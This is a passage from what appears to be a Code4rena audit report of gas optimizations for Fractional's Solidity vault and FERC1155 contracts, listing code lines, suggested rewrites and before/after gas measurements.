151: bytes4[] memory _selectors
168: address[] memory _plugins
169: bytes4[] memory _selectors
487: function generateMerkleTree(address[] memory _modules)
44: function verifyProof(bytes32[] memory _proof)
125: function hashLevel(bytes32[] memory _data)
24: function setURI(uint256 _id, string memory _uri)
Replace memory
with calldata
Constant expressions are re-calculated each time they are in use, costing an extra 97
gas than a constant every time they are called.
3 instances include:
5: bytes32 constant DOMAIN_TYPEHASH = keccak256(
6: "EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)"
7: );
9: /// @dev The EIP-712 typehash for the permit struct used by the contract
10: bytes32 constant PERMIT_TYPEHASH = keccak256(
11: "Permit(address owner,address operator,uint256 tokenId,bool approved,uint256 nonce,uint256 deadline)"
12: );
14: /// @dev The EIP-712 typehash for the permit all struct used by the contract
15: bytes32 constant PERMIT_ALL_TYPEHASH = keccak256(
16: "PermitAll(address owner,address operator,bool approved,uint256 nonce,uint256 deadline)"
17: );
Mark these as immutable
instead of constant
Marking constants as private
save gas upon deployment, as the compiler does not have to create getter functions for these variables. It is worth noting that a private
variable can still be read using either the verified contract source code or the bytecode. This may affect readability so this is left at the team's discretion
6 instances:
17: address public immutable factory;
18: /// @notice Address of FERC1155 token contract
19: address public immutable fNFT;
20: /// @notice Address of Implementation for FERC1155 token contract
21: address public immutable fNFTImplementation;
35: uint256 public constant PROPOSAL_PERIOD = 2 days;
36: /// @notice Time length of the rejection period
37: uint256 public constant REJECTION_PERIOD = 4 days;
43: uint256 public constant PROPOSAL_PERIOD = 7 days;
Make the constants private
instead of public
Custom errors from Solidity 0.8.4 are cheaper than revert strings (cheaper deployment cost and runtime cost when the revert condition is met) while providing the same amount of information, as explained here
Custom errors are defined using the error statement
5 instances:
263: require(
264: msg.sender == _from ||
265: isApprovedForAll[_from][msg.sender] ||
266: isApproved[_from][msg.sender][_id],
268: )
275: require(
276: _to.code.length == 0
277: ? _to != address(0)
278: : INFTReceiver(_to).onERC1155Received(
279: msg.sender,
280: _from,
281: _id,
282: _amount,
283: _data
284: ) == INFTReceiver.onERC1155Received.selector,
286: );
297: require(metadata[_id] != address(0), "NO METADATA");
62: require(_data.length > 1, "wont generate root for single leaf");
78: require(_data.length > 1, "wont generate root for single leaf");
Replace require and revert statements with custom errors.
For instance, in FERC1155.sol
-297: require(metadata[_id] != address(0), "NO METADATA");
+if (metadata[_id] == address(0)) {
+ revert NoMetadata();
and define the custom error in the contract
+error NoMetadata();
- original gas costs:\
╭───────────────────┬─────────────────┬───────┬────────┬───────┬─────────╮ │ FERC1155 contract ┆ ┆ ┆ ┆ ┆ │ ╞═══════════════════╪═════════════════╪═══════╪════════╪═══════╪═════════╡ │ Deployment Cost ┆ Deployment Size ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ 1863562 ┆ 9340 ┆ ┆ ┆ ┆ │ ╰───────────────────┴─────────────────┴───────┴────────┴───────┴─────────╯
- new gas costs with the changes made above - ie one require statement changed into a custom error:\
╭───────────────────┬─────────────────┬───────┬────────┬───────┬─────────╮ │ FERC1155 contract ┆ ┆ ┆ ┆ ┆ │ ╞═══════════════════╪═════════════════╪═══════╪════════╪═══════╪═════════╡ │ Deployment Cost ┆ Deployment Size ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ 1857755 ┆ 9311 ┆ ┆ ┆ ┆ │ ╰───────────────────┴─────────────────┴───────┴────────┴───────┴─────────╯
gas saved upon deployment.
Empty blocks should emit an event, or revert. If not, they can simply be removed to save gas upon deployment.
This is valid for receive()
functions, but also constructors
4 instances:
32: receive() external payable {}
53: receive() external payable {}
63: receive() external payable {}
8: constructor() {}
Emit an event in these blocks, or remove them altogether.
and block.number
are added to event information by default, explicitly adding them is a waste of gas.
1 instance:
100: emit Start(
101: _vault,
102: msg.sender,
103: block.timestamp,
104: buyoutPrice,
105: fractionPrice
106: );
Remove the event field emitting block.timestamp
, as it is redundant.
A function with access control marked as payable will be cheaper for legitimate callers: the compiler removes checks for msg.value
, saving approximately 20
gas per function call.
56: function burn(
57: address _from,
58: uint256 _id,
59: uint256 _amount
60: ) external onlyRegistry
79: function mint(
80: address _to,
81: uint256 _id,
82: uint256 _amount,
83: bytes memory _data
84: ) external onlyRegistry
198: function setContractURI(string calldata _uri) external onlyController
205: function setMetadata(address _metadata, uint256 _id)
206: external
207: onlyController
217: function setRoyalties(
218: uint256 _id,
219: address _receiver,
220: uint256 _percentage
221: ) external onlyController
229: function transferController(address _newController)
230: external
231: onlyController
76: if (owner != msg.sender) revert NotOwner(owner, msg.sender);
87: if (owner != msg.sender) revert NotOwner(owner, msg.sender);
94: if (owner != msg.sender) revert NotOwner(owner, msg.sender);
102: if (owner != msg.sender) revert NotOwner(owner, msg.sender);
Mark these functions as payable
If a variable is set in the constructor and never modified afterwards, marking it as immutable
can save a storage slot - 20,000
gas. This also saves 97
gas on every read access of the variable.
8 instances:
15: address public implementation
29: address public registry
31: address public supply
33: address public transfer
37: address payable public buyout
39: address public registry
14: address public supply;
19: address public registry
Mark these variables as immutable
When we define internal functions to perform computation:
- The contract’s code size gets bigger
- the function call consumes more gas than executing it as an inlined function (part of the code, without the function call)
When it does not affect readability, it is recommended to inline functions in order to save gas
3 instances:
324: function _computePermitStructHash(
325: address _owner,
326: address _operator,
327: uint256 _id,
328: bool _approved,
329: uint256 _deadline
330: ) internal returns (bytes32)
350: function _computePermitAllStructHash(
351: address _owner,
352: address _operator,
353: bool _approved,
354: uint256 _deadline
355: ) internal returns (bytes32)
142: function _revertedWithReason(bytes memory _response) internal pure
Inline these functions where they are called:
- gas costs before inlining:
╭───────────────────┬─────────────────┬───────┬────────┬───────┬─────────╮ │ FERC1155 contract ┆ ┆ ┆ ┆ ┆ │ ╞═══════════════════╪═════════════════╪═══════╪════════╪═══════╪═════════╡ │ Deployment Cost ┆ Deployment Size ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ 1863562 ┆ 9340 ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ Function Name ┆ min ┆ avg ┆ median ┆ max ┆ # calls │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ permit ┆ 898 ┆ 26460 ┆ 25659 ┆ 49995 ┆ 12 │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ permitAll ┆ 853 ┆ 27880 ┆ 25585 ┆ 49588 ┆ 13 │ ╰───────────────────┴─────────────────┴───────┴────────┴───────┴─────────╯ ╭────────────────────────┬─────────────────┬───────┬────────┬───────┬─────────╮ │ Vault contract ┆ ┆ ┆ ┆ ┆ │ ╞════════════════════════╪═════════════════╪═══════╪════════╪═══════╪═════════╡ │ Deployment Cost ┆ Deployment Size ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ 816851 ┆ 4112 ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ Function Name ┆ min ┆ avg ┆ median ┆ max ┆ # calls │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ execute ┆ 3585 ┆ 40629 ┆ 61371 ┆ 66336 ┆ 182 │ ╰────────────────────────┴─────────────────┴───────┴────────┴───────┴─────────╯
- gas costs after inlining:
╭───────────────────┬─────────────────┬───────┬────────┬───────┬─────────╮ │ FERC1155 contract ┆ ┆ ┆ ┆ ┆ │ ╞═══════════════════╪═════════════════╪═══════╪════════╪═══════╪═════════╡ │ Deployment Cost ┆ Deployment Size ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ 1833333 ┆ 9189 ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ Function Name ┆ min ┆ avg ┆ median ┆ max ┆ # calls │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ permit ┆ 898 ┆ 26348 ┆ 25519 ┆ 49855 ┆ 12 │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ permitAll ┆ 853 ┆ 27768 ┆ 25447 ┆ 49450 ┆ 13 │ ╰───────────────────┴─────────────────┴───────┴────────┴───────┴─────────╯ ╭────────────────────────┬─────────────────┬───────┬────────┬───────┬─────────╮ │ Vault contract ┆ ┆ ┆ ┆ ┆ │ ╞════════════════════════╪═════════════════╪═══════╪════════╪═══════╪═════════╡ │ Deployment Cost ┆ Deployment Size ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ 815051 ┆ 4103 ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ Function Name ┆ min ┆ avg ┆ median ┆ max ┆ # calls │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ execute ┆ 3585 ┆ 40628 ┆ 61371 ┆ 66336 ┆ 182 │ ╰────────────────────────┴─────────────────┴───────┴────────┴───────┴─────────╯
In FERC1155.sol
gas is saved upon deployment112
gas is saved perpermit
call on average112
gas is saved perpermitAll
call on average
In Vault.sol
gas is saved upon deployment
X += Y costs 22
more gas than X = X + Y. This can mean a lot of gas wasted in a function call when the computation is repeated n
times (loops)
15 instances include:
62: totalSupply[_id] -= _amount;
86: totalSupply[_id] += _amount;
270: balanceOf[_from][_id] -= _amount;
271: balanceOf[_to][_id] += _amount;
139: buyoutInfo[_vault].ethBalance -= ethAmount
176: buyoutInfo[_vault].ethBalance += msg.value
123: proposal.totalEth += msg.value;
124: userProposalEth[_proposalId][msg.sender] += msg.value;
134: proposal.totalFractions += _amount;
135: userProposalFractions[_proposalId][msg.sender] += _amount;
156: proposal.totalFractions -= _amount;
160: proposal.totalEth -= ethAmount;
497: treeLength += IModule(_modules[i]).getLeafNodes().length;
147: for (uint256 i; i < length - 1; i += 2)
190: ceil -= pOf2;
Use X = X + Y
instead of X += Y
(same with -
When a require
statement is used multiple times, it is cheaper in deployment costs to use a modifier instead.
2 instances where a modifier can be used:
76: if (owner != msg.sender) revert NotOwner(owner, msg.sender);
87: if (owner != msg.sender) revert NotOwner(owner, msg.sender);
94: if (owner != msg.sender) revert NotOwner(owner, msg.sender);
102: if (owner != msg.sender) revert NotOwner(owner, msg.sender);
62: require(_data.length > 1, "wont generate root for single leaf");
78: require(_data.length > 1, "wont generate root for single leaf");
Use modifiers for these repeated statements.
Prefix increments are cheaper than postfix increments - 6
gas. This can mean interesting savings in for
2 instances:
78: for (uint256 i = 0; i < length; i++)
104: for (uint256 i = 0; i < length; i++)
Change i++
to ++i
Revert strings cost more gas to deploy if the string is larger than 32 bytes. It costs an extra 9,500
gas per string exceeding that 32-byte size upon deployment.
Revert strings exceeding 32 bytes include instances:
62: require(_data.length > 1, "wont generate root for single leaf");
78: require(_data.length > 1, "wont generate root for single leaf");
Write the error strings so that they do not exceed 32 bytes. For further gas savings, consider also using custom errors.
A division by 2 can be calculated by shifting one to the right. While the DIV
opcode uses 5
gas, the SHR
opcode only uses 3
gas. Furthermore, Solidity's division operation also includes a division-by-0 prevention which is bypassed using shifting.
3 instances:
100: _node = _node / 2
136: result = new bytes32[](length / 2 + 1);
142: result = new bytes32[](length / 2)
Replace / 2
with >>1
Reference types cached in memory cost more gas than using storage, as new memory is allocated for these variables, copying data from storage to memory.
40: VaultInfo memory info = vaultToToken[msg.sender];
118: VaultInfo memory info = vaultToToken[msg.sender];
128: VaultInfo memory info = vaultToToken[_vault];
136: VaultInfo memory info = vaultToToken[_vault];
- original gas costs with these
VaultInfo memory info
│ VaultRegistry contract ┆ ┆ ┆ ┆ ┆ │
│ Deployment Cost ┆ Deployment Size ┆ ┆ ┆ ┆ │
│ 3898606 ┆ 19409 ┆ ┆ ┆ ┆ │
│ Function Name ┆ min ┆ avg ┆ median ┆ max ┆ # calls │
│ burn ┆ 2349 ┆ 4218 ┆ 4255 ┆ 4255 ┆ 52 │
│ mint ┆ 51597 ┆ 54389 ┆ 54845 ┆ 54845 ┆ 107 │
│ totalSupply ┆ 1878 ┆ 1878 ┆ 1878 ┆ 1878 ┆ 203 |
- new gas costs with these four instances as
VaultInfo storage info
│ VaultRegistry contract ┆ ┆ ┆ ┆ ┆ │
│ Deployment Cost ┆ Deployment Size ┆ ┆ ┆ ┆ │
│ 3881997 ┆ 19326 ┆ ┆ ┆ ┆ │
│ Function Name ┆ min ┆ avg ┆ median ┆ max ┆ # calls │
│ burn ┆ 2268 ┆ 4153 ┆ 4190 ┆ 4190 ┆ 52 │
│ mint ┆ 51516 ┆ 54308 ┆ 54764 ┆ 54764 ┆ 107 │
│ totalSupply ┆ 1833 ┆ 1833 ┆ 1833 ┆ 1833 ┆ 203 |
gas is saved upon deployment80
gas is saved permint
call on average65
gas is saved perburn
call on average45
gas is saved pertotalSupply
Use storage
instead of memory
Using a storage
pointer is cheaper than reading a struct field several times.
297: (buyoutInfo[_vault].state, buyoutInfo[_vault].proposer) = (
298: State.SUCCESS,
299: msg.sender
300: );
Use a storage
+ Auction storage _vaultInfo = buyoutInfo[_vault];
+ (_vaultInfo.state, _vaultInfo.proposer) = (
-297: (buyoutInfo[_vault].state, buyoutInfo[_vault].proposer) = (
298: State.SUCCESS,
299: msg.sender
300: );
- original gas costs
╭──────────────────────┬─────────────────┬────────┬────────┬────────┬─────────╮ │ Buyout contract ┆ ┆ ┆ ┆ ┆ │ ╞══════════════════════╪═════════════════╪════════╪════════╪════════╪═════════╡ │ Deployment Cost ┆ Deployment Size ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ 2779003 ┆ 13880 ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ Function Name ┆ min ┆ avg ┆ median ┆ max ┆ # calls │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ redeem ┆ 4184 ┆ 30536 ┆ 41198 ┆ 41198 ┆ 8 │ ╰──────────────────────┴─────────────────┴────────┴────────┴────────┴─────────╯
- new gas costs
╭──────────────────────┬─────────────────┬────────┬────────┬────────┬─────────╮ │ Buyout contract ┆ ┆ ┆ ┆ ┆ │ ╞══════════════════════╪═════════════════╪════════╪════════╪════════╪═════════╡ │ Deployment Cost ┆ Deployment Size ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ 2775995 ┆ 13865 ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ Function Name ┆ min ┆ avg ┆ median ┆ max ┆ # calls │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ redeem ┆ 4184 ┆ 30532 ┆ 41193 ┆ 41193 ┆ 8 │ ╰──────────────────────┴─────────────────┴────────┴────────┴────────┴─────────╯
gas is saved upon deployment5
gas is saved perredeem
call on average
Gas can be saved by avoid ERC20.transfer
function calls when the amount
to be transferred is 0
Instances include:
129: IERC1155(token).safeTransferFrom(
130: msg.sender,
131: address(this),
132: id,
133: _amount,
134: ""
135: );
There is no check that _amount
is not zero ( it is a function argument)
141: _sendEthOrWeth(msg.sender, ethAmount);
In the case _amount
was zero, ethAmount
would be zero too
Add checks to ensure the _amount
is not 0
The default "checked" behavior costs more gas when adding/diving/multiplying, because under-the-hood those checks are implemented as a series of opcodes that, prior to performing the actual arithmetic, check for under/overflow and revert if it is detected.
If it can statically be determined there is no possible way for your arithmetic to under/overflow (such as a condition in an if statement), surrounding the arithmetic in an unchecked
block will save gas.
is cannot overflow as it is a for
78: for (uint256 i = 0; i < length; i++)
is cannot overflow as it is a for
104: for (uint256 i = 0; i < length; i++)
Place the arithmetic operations in an unchecked
Redundant external calls waste gas.
is called twice:
438: (, address proposer, State current, , , ) = IBuyout(buyout).buyoutInfo(_vault)
447: (, , , , , uint256 lastTotalSupply) = IBuyout(buyout).buyoutInfo(_vault);
-438: (, address proposer, State current, , , ) = IBuyout(buyout).buyoutInfo(
-439: _vault
-440: );
+438: (, address proposer, State current, , , uint256 lastTotalSupply) = IBuyout(buyout).buyoutInfo(
+439: _vault
+440: );
441: State required = State.SUCCESS;
442: if (current != required) revert IBuyout.InvalidState(required, current);
443: // Reverts if proposer of buyout is not this contract
444: if (proposer != address(this)) revert NotProposalBuyout();
446: // Gets the last total supply of fractions for the vault
-447: (, , , , , uint256 lastTotalSupply) = IBuyout(buyout).buyoutInfo(
-448: _vault
-449: );
- gas costs before amendment
╭──────────────────────────┬─────────────────┬────────┬────────┬────────┬─────────╮ │ Migration contract ┆ ┆ ┆ ┆ ┆ │ ╞══════════════════════════╪═════════════════╪════════╪════════╪════════╪═════════╡ │ Deployment Cost ┆ Deployment Size ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ 3202385 ┆ 15886 ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ Function Name ┆ min ┆ avg ┆ median ┆ max ┆ # calls │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ migrateFractions ┆ 4079 ┆ 15056 ┆ 5786 ┆ 39226 ┆ 6 │ ╰──────────────────────────┴─────────────────┴────────┴────────┴────────┴─────────╯
- gas costs after amendment
╭──────────────────────────┬─────────────────┬────────┬────────┬────────┬─────────╮ │ Migration contract ┆ ┆ ┆ ┆ ┆ │ ╞══════════════════════════╪═════════════════╪════════╪════════╪════════╪═════════╡ │ Deployment Cost ┆ Deployment Size ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ 3166145 ┆ 15705 ┆ ┆ ┆ ┆ │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ Function Name ┆ min ┆ avg ┆ median ┆ max ┆ # calls │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌┤ │ migrateFractions ┆ 4094 ┆ 14384 ┆ 5786 ┆ 36970 ┆ 6 │ ╰──────────────────────────┴─────────────────┴────────┴────────┴────────┴─────────╯
gas is saved upon deployment672
gas is saved permigrateFractions
call on average
C4 is an open organization governed by participants in the community.
C4 Contests incentivize the discovery of exploits, vulnerabilities, and bugs in smart contracts. Security researchers are rewarded at an increasing rate for finding higher-risk issues. Contest submissions are judged by a knowledgeable security researcher and solidity developer and disclosed to sponsoring developers. C4 does not conduct formal verification regarding the provided code but instead provides final verification.
C4 does not provide any guarantee or warranty regarding the security of this project. All smart contract software should be used at the sole risk and responsibility of users.